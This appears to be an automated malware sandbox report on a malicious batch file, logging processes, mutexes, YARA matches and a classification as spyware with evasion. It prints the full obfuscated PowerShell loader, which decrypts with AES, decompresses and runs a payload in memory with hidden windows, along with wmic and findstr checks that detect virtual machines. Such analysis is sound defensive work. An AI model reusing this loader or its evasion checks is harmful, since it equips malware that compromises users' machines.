Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000022123BFCE1818_3_0000022123BFCE18
Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000022123BCCC9418_3_0000022123BCCC94
Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000022123BC23F018_3_0000022123BC23F0
Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000022123BCCE1818_3_0000022123BCCE18
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C2D89418_2_0000022123C2D894
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C22FF018_2_0000022123C22FF0
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C2DA1818_2_0000022123C2DA18
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C5D89418_2_0000022123C5D894
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C52FF018_2_0000022123C52FF0
Source: C:\Windows\System32\cmd.exeCode function: 18_2_0000022123C5DA1818_2_0000022123C5DA18
Source: C:\Windows\System32\conhost.exeCode function: 19_3_0000013F081CCE1819_3_0000013F081CCE18
Source: C:\Windows\System32\conhost.exeCode function: 19_3_0000013F081C23F019_3_0000013F081C23F0
Source: C:\Windows\System32\conhost.exeCode function: 19_3_0000013F081CCC9419_3_0000013F081CCC94
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E6DA1819_2_0000013F08E6DA18
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E62FF019_2_0000013F08E62FF0
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E6D89419_2_0000013F08E6D894
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E9DA1819_2_0000013F08E9DA18
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E92FF019_2_0000013F08E92FF0
Source: C:\Windows\System32\conhost.exeCode function: 19_2_0000013F08E9D89419_2_0000013F08E9D894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B80DD6835_2_00007FFD9B80DD68
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFD9B80E33935_2_00007FFD9B80E339
Source: C:\Windows\System32\conhost.exeCode function: 36_3_000001FD1776CE1836_3_000001FD1776CE18
Source: C:\Windows\System32\conhost.exeCode function: 36_3_000001FD1776CC9436_3_000001FD1776CC94
Source: C:\Windows\System32\conhost.exeCode function: 36_3_000001FD177623F036_3_000001FD177623F0
Source: C:\Windows\System32\conhost.exeCode function: 36_2_000001FD186D2FF036_2_000001FD186D2FF0
Source: C:\Windows\System32\conhost.exeCode function: 36_2_000001FD186DD89436_2_000001FD186DD894
Source: C:\Windows\System32\conhost.exeCode function: 36_2_000001FD186DDA1836_2_000001FD186DDA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_3_0000017C6DA823F037_3_0000017C6DA823F0
Source: C:\Windows\System32\dllhost.exeCode function: 37_3_0000017C6DA8CE1837_3_0000017C6DA8CE18
Source: C:\Windows\System32\dllhost.exeCode function: 37_3_0000017C6DA8CC9437_3_0000017C6DA8CC94
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140001CF037_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140002D4C37_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_000000014000320437_2_0000000140003204
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_000000014000243437_2_0000000140002434
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_000000014000127437_2_0000000140001274
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DAB2FF037_2_0000017C6DAB2FF0
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DABDA1837_2_0000017C6DABDA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DABD89437_2_0000017C6DABD894
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DD72FF037_2_0000017C6DD72FF0
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DD7DA1837_2_0000017C6DD7DA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000017C6DD7D89437_2_0000017C6DD7D894
Source: C:\Windows\System32\winlogon.exeCode function: 38_3_00000225DC61CE1838_3_00000225DC61CE18
Source: C:\Windows\System32\winlogon.exeCode function: 38_3_00000225DC6123F038_3_00000225DC6123F0
Source: C:\Windows\System32\winlogon.exeCode function: 38_3_00000225DC61CC9438_3_00000225DC61CC94
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC64DA1838_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC642FF038_2_00000225DC642FF0
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC64D89438_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC67DA1838_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC672FF038_2_00000225DC672FF0
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_00000225DC67D89438_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exeCode function: 39_3_00000202C0ABCE1839_3_00000202C0ABCE18
Source: C:\Windows\System32\lsass.exeCode function: 39_3_00000202C0ABCC9439_3_00000202C0ABCC94
Source: C:\Windows\System32\lsass.exeCode function: 39_3_00000202C0AB23F039_3_00000202C0AB23F0
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0AEDA1839_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0AED89439_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0AE2FF039_2_00000202C0AE2FF0
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0B1DA1839_2_00000202C0B1DA18
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0B1D89439_2_00000202C0B1D894
Source: C:\Windows\System32\lsass.exeCode function: 39_2_00000202C0B12FF039_2_00000202C0B12FF0
Source: C:\Windows\System32\svchost.exeCode function: 40_3_000002A6612DCE1840_3_000002A6612DCE18
Source: C:\Windows\System32\svchost.exeCode function: 40_3_000002A6612D23F040_3_000002A6612D23F0
Source: C:\Windows\System32\svchost.exeCode function: 40_3_000002A6612DCC9440_3_000002A6612DCC94
Source: C:\Windows\System32\svchost.exeCode function: 40_2_000002A66130DA1840_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exeCode function: 40_2_000002A661302FF040_2_000002A661302FF0
Source: C:\Windows\System32\svchost.exeCode function: 40_2_000002A66130D89440_2_000002A66130D894
Source: C:\Windows\System32\dwm.exeCode function: 41_3_000002BAAEDCCE1841_3_000002BAAEDCCE18
Source: C:\Windows\System32\dwm.exeCode function: 41_3_000002BAAEDC23F041_3_000002BAAEDC23F0
Source: C:\Windows\System32\dwm.exeCode function: 41_3_000002BAAEDCCC9441_3_000002BAAEDCCC94
Source: C:\Windows\System32\dwm.exeCode function: 41_3_000002BAAED9CE1841_3_000002BAAED9CE18
Source: C:\Windows\System32\dwm.exeCode function: 41_3_000002BAAED923F041_3_000002BAAED923F0
Source: C:\Windows\System32\dwm.exeCode function: 41_3_000002BAAED9CC9441_3_000002BAAED9CC94
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDCDA1841_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDC2FF041_2_000002BAAEDC2FF0
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDCD89441_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDFDA1841_2_000002BAAEDFDA18
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDF2FF041_2_000002BAAEDF2FF0
Source: C:\Windows\System32\dwm.exeCode function: 41_2_000002BAAEDFD89441_2_000002BAAEDFD894
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_3_0000027052A123F042_3_0000027052A123F0
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_3_0000027052A1CC9442_3_0000027052A1CC94
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_3_0000027052A1CE1842_3_0000027052A1CE18
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_2_0000027053062FF042_2_0000027053062FF0
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_2_000002705306DA1842_2_000002705306DA18
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 42_2_000002705306D89442_2_000002705306D894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3852 -s 2212
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2674
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682
Source: unknownProcess created: Commandline size = 5571
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682Jump to behavior
Source: Process Memory Space: powershell.exe PID: 3852, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.drBinary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.drBinary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.drBinary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.drBinary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.drBinary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.49.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.drBinary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.49.drBinary string: C:\Device\HarddiskVolume3`
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.drBinary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.49.drBinary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.drBinary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.49.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.49.drBinary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.drBinary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.drBinary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.drBinary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engineClassification label: mal100.spyw.evad.winCMD@55/94@1/1
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,37_2_0000000140002D4C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,34_2_004011AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,34_2_004017A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20241003Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\6983353
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\5387306
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\8404857
Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3852
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1kp2q3ph.fnd.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3852 -s 2212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8184 -s 2036
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8184 -s 2248
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
